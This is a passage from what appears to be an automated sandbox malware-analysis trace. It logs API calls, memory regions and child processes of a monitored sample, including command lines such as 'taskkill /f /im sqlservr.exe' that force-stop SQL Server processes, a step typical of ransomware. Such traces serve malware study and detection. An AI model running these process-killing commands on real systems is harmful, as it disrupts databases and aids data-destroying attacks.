dwMilliseconds=0xffffffff) returned 0x0 [0151.166] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0151.166] CloseHandle (hObject=0x9c) returned 1 [0151.166] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0151.166] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0151.167] GetProcessHeap () returned 0x490000 [0151.167] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x497cc0) returned 1 [0151.167] GetEnvironmentStringsW () returned 0x49b160* [0151.168] GetProcessHeap () returned 0x490000 [0151.168] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa9c) returned 0x497cc0 [0151.168] FreeEnvironmentStringsA (penv="=") returned 1 [0151.168] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0151.168] GetProcessHeap () returned 0x490000 [0151.168] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x497cc0) returned 1 [0151.168] GetEnvironmentStringsW () returned 0x49b160* [0151.168] GetProcessHeap () returned 0x490000 [0151.168] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xa9c) returned 0x497cc0 [0151.169] FreeEnvironmentStringsA (penv="=") returned 1 [0151.169] GetProcessHeap () returned 0x490000 [0151.169] RtlFreeHeap (HeapHandle=0x490000, Flags=0x0, BaseAddress=0x49b110) returned 1 [0151.169] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0151.169] _get_osfhandle (_FileHandle=1) returned 0x140 [0151.169] SetConsoleMode (hConsoleHandle=0x140, dwMode=0x0) returned 0 [0151.169] _get_osfhandle (_FileHandle=1) returned 0x140 [0151.169] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0151.169] _get_osfhandle (_FileHandle=0) returned 0x13c [0151.169] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0151.169] GetConsoleOutputCP () returned 0x1b5 [0151.171] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0151.171] SetThreadUILanguage (LangId=0x0) returned 0x409 [0151.175] exit (_Code=128) Thread: id = 140 os_tid = 0xe58 Process: id = "15" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x34196000" os_pid = "0xd9c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "14" os_parent_pid = "0xf88" cmd_line = "taskkill /f /im sqlservr.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1547 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1548 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1549 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1550 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 1551 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1552 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 1553 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 1554 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 1555 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 1556 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 1557 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 1558 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1559 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1560 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1561 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1562 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 1563 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1564 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 1565 start_va = 0x4500000 end_va = 0x450ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 1566 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1567 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1568 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1569 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1570 start_va = 0x4510000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004510000" filename = "" Region: id = 1571 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1572 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1573 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1574 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1575 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1576 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1577 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1578 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1579 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 1580 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 1581 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1582 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1583 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1584 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1585 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1586 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1587 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1588 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1589 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1590 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1591 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1592 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1593 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 1594 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 1595 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 1596 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 1597 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 1598 start_va = 0x4480000 end_va = 0x44effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 1599 start_va = 0x4480000 end_va = 0x44a9fff monitored = 0 entry_point = 0x4485680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1600 start_va = 0x44e0000 end_va = 0x44effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 1601 start_va = 0x4510000 end_va = 0x4697fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004510000" filename = "" Region: id = 1602 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 1603 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1604 start_va = 0x4800000 end_va = 0x4980fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004800000" filename = "" Region: id = 1605 start_va = 0x4990000 end_va = 0x5d8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004990000" filename = "" Region: id = 1606 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1607 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 1608 start_va = 0x4480000 end_va = 0x4484fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 1609 start_va = 0x4490000 end_va = 0x4490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 1610 start_va = 0x44a0000 end_va = 0x44a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 1611 start_va = 0x5d90000 end_va = 0x60c6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1612 start_va = 0x60d0000 end_va = 0x61b9fff monitored = 0 entry_point = 0x610d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1613 start_va = 0x44b0000 end_va = 0x44b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 1614 start_va = 0x60d0000 end_va = 0x61affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1615 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1616 start_va = 0x44c0000 end_va = 0x44c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044c0000" filename = "" Region: id = 1617 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1618 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 1619 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 1620 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 1621 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1622 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 1623 start_va = 0x46a0000 end_va = 0x46dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046a0000" filename = "" Region: id = 1624 start_va = 0x61b0000 end_va = 0x61effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061b0000" filename = "" Region: id = 1625 start_va = 0x61f0000 end_va = 0x622ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000061f0000" filename = "" Region: id = 1626 start_va = 0x6230000 end_va = 0x626ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006230000" filename = "" Region: id = 1627 start_va = 0x6270000 end_va = 0x62affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006270000" filename = "" Region: id = 1628 start_va = 0x62b0000 end_va = 0x62effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062b0000" filename = "" Region: id = 1629 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 1630 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 1632 start_va = 0x44f0000 end_va = 0x44f5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Thread: id = 141 os_tid = 0xe4c Thread: id = 142 os_tid = 0xe40 Thread: id = 143 os_tid = 0xe6c Thread: id = 144 os_tid = 0xac8 Thread: id = 145 os_tid = 0xbd0 Process: id = "16" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x33815000" os_pid = "0x12bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im sqlwriter.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1634 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1635 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1636 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1637 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1638 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1639 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1640 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1641 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1642 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1643 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1644 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 1645 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1646 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1647 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1648 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1649 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 1650 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1651 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 1652 start_va = 0x5b0000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1653 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1654 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1655 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1656 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1657 start_va = 0x5c0000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1658 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1659 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1660 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1661 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1662 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1663 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1664 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1665 start_va = 0x790000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 1666 start_va = 0x5c0000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 1667 start_va = 0x690000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 1668 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1669 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1670 start_va = 0x890000 end_va = 0xbc6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 146 os_tid = 0x12c4 [0151.800] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0151.800] __set_app_type (_Type=0x1) [0151.800] __p__fmode () returned 0x74974d6c [0151.800] __p__commode () returned 0x74975b1c [0151.800] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0151.800] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0151.801] GetCurrentThreadId () returned 0x12c4 [0151.801] OpenThread (dwDesiredAccess=0x1fffff, 